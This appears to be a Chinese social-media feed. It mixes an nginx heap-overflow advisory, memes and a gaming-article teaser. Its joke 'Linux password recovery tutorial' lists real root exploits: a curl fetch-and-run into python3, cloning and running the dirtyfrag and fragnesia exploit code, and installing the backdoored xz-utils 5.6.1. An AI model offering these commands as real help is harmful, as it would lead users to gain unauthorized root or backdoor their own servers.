这鸟装错系统了

Nginx 被发现一个存在18年的内存损坏漏洞，可导致远程代码执行，利用门槛低

漏洞存在于每个通用发行版都会包含的rewrite模块 ngx_http_rewrite_module ，影响开原版本Nginx 0.6.27至最近的1.30.0版本，在计算目标缓冲区大小时，使用的是原始字节长度，但在实际写入时，却进行了 URL 转义（ ⁠+⁠ , ⁠%⁠ , ⁠&⁠ 等字符会扩展为 3 倍长度），溢出长度可控导致堆喷射

建议用户尽快更新至 1.30.1 / 1.31.0 版本

Ref: https://depthfirst.com/nginx-rift

1. Linux 找回密码教程，建议收藏！
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码

2. 你的 Linux 密码又忘了？
没关系，这里还有一个新的！
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

3. 不想再忘记密码了？
我们有专业的黑客团队帮您运维服务器和保管密码！
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh

4. 容易忘记密码的有福了，每天都有新办法！
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡，让它down掉，然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可

5. 什么，你买不起高端网卡？那试试这个吧！
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp

6. 听说您的机房不允许ssh外连，只能通过KVM物理访问服务器? 没关系，我们的专业黑客团队也可以通过nginx帮助运维您的服务器！
https://depthfirst.com/nginx-rift

你为啥直接用AI重写啊？RiiR 里不是这样的！你应该先好好学习Rust，然后硬啃旧代码仔细重新梳理架构，重新组织成对Rust友好的结构，然后和borrowchecker大战三百回合，最后在某个写了几个月大巨大PR中CI全绿，请求review，贡献者仔细审查同意合并，然后才变成Rust项目，你怎么上来直接Agent啊？RiiR根本不是这样的，我不接受！

非原创，来源要求匿名

做点沙雕图
《为什么大眼夹比copilot更强》

不少玩家都会把游戏里一些重复度高、却又不得不完成的任务戏称为“打工”。一旦某款游戏（尤其是GaaS游戏）里“打工”的成分太高，往往会引来批评。只不过，这种批评针对的大多是“被迫打工”，如果放在一些摆明了要玩家主动干活的游戏里，情况很可能完全不同。 https://www.chuapp.com/article/291356.html